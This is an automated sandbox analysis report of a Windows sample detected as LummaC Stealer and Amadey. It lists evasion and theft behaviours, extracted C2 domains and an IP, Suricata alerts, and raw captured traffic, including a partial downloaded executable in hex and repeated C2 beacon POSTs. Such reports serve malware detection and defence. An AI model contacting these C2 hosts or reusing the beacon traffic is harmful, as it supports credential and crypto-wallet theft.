Edit tour

Windows Analysis Report
Dl6wuWiQdg.exe

Overview

General Information

Sample name:	Dl6wuWiQdg.exe renamed because original name is a hash value
Original sample name:	b71b7aedba64dfac7fb62b18fe22e956.exe
Analysis ID:	1582703
MD5:	b71b7aedba64dfac7fb62b18fe22e956
SHA1:	94dbd7b49946dac493466b8702f7ca527833b9cc
SHA256:	a28bd583dab27c6e95c9f14ae64bd0b6831cc9226737f68b1a8bf9dd033843fa
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Dl6wuWiQdg.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\Dl6wuWiQdg.exe" MD5: B71B7AEDBA64DFAC7FB62B18FE22E956)

8WYS1MQTL0QCOHKIPL8.exe (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)

skotes.exe (PID: 5840 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)

skotes.exe (PID: 2884 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)

skotes.exe (PID: 4148 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: LummaC

{"C2 url": ["nearycrepso.shop", "tirepublicerj.shop", "abruptyopsn.shop", "fancywaxxers.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop", "rabidcowse.shop"], "Build id": "W0uk--"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: Dl6wuWiQdg.exe PID: 6248	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Dl6wuWiQdg.exe PID: 6248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Dl6wuWiQdg.exe PID: 6248	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.skotes.exe.780000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.780000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.8WYS1MQTL0QCOHKIPL8.exe.d50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.skotes.exe.780000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:48:28.302124+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	104.21.112.1	443	TCP
2024-12-31T09:48:29.641749+0100	2028371	3	Unknown Traffic	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-31T09:48:30.870750+0100	2028371	3	Unknown Traffic	192.168.2.6	49715	104.21.112.1	443	TCP
2024-12-31T09:48:32.626850+0100	2028371	3	Unknown Traffic	192.168.2.6	49716	104.21.112.1	443	TCP
2024-12-31T09:48:33.719521+0100	2028371	3	Unknown Traffic	192.168.2.6	49717	104.21.112.1	443	TCP
2024-12-31T09:48:34.975857+0100	2028371	3	Unknown Traffic	192.168.2.6	49718	104.21.112.1	443	TCP
2024-12-31T09:48:36.512535+0100	2028371	3	Unknown Traffic	192.168.2.6	49725	104.21.112.1	443	TCP
2024-12-31T09:48:38.587255+0100	2028371	3	Unknown Traffic	192.168.2.6	49742	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:48:29.154933+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49712	104.21.112.1	443	TCP
2024-12-31T09:48:30.138929+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-31T09:48:39.122566+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49742	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:48:29.154933+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49712	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:48:30.138929+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49713	104.21.112.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:48:28.302124+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49712	104.21.112.1	443	TCP
2024-12-31T09:48:29.641749+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49713	104.21.112.1	443	TCP
2024-12-31T09:48:30.870750+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49715	104.21.112.1	443	TCP
2024-12-31T09:48:32.626850+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49716	104.21.112.1	443	TCP
2024-12-31T09:48:33.719521+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49717	104.21.112.1	443	TCP
2024-12-31T09:48:34.975857+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49718	104.21.112.1	443	TCP
2024-12-31T09:48:36.512535+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49725	104.21.112.1	443	TCP
2024-12-31T09:48:38.587255+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.6	49742	104.21.112.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:48:27.818762+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.6	49371	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:48:35.412465+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49718	104.21.112.1	443	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:49:10.169424+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49946	185.215.113.43	80	TCP

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:48:39 GMTContent-Type: application/octet-streamContent-Length: 3243520Last-Modified: Tue, 31 Dec 2024 08:37:28 GMTConnection: keep-aliveETag: "6773ad48-317e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 7e d3 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 6f 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 6e 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 65 7a 69 76 6f 71 75 00 c0 2a 00 00 b0 06 00 00 c0 2a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 63 61 65 77 6c 72 78 00 10 00 00 00 70 31 00 00 04 00 00 00 58 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 31 00 00 22 00 00 00 5c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
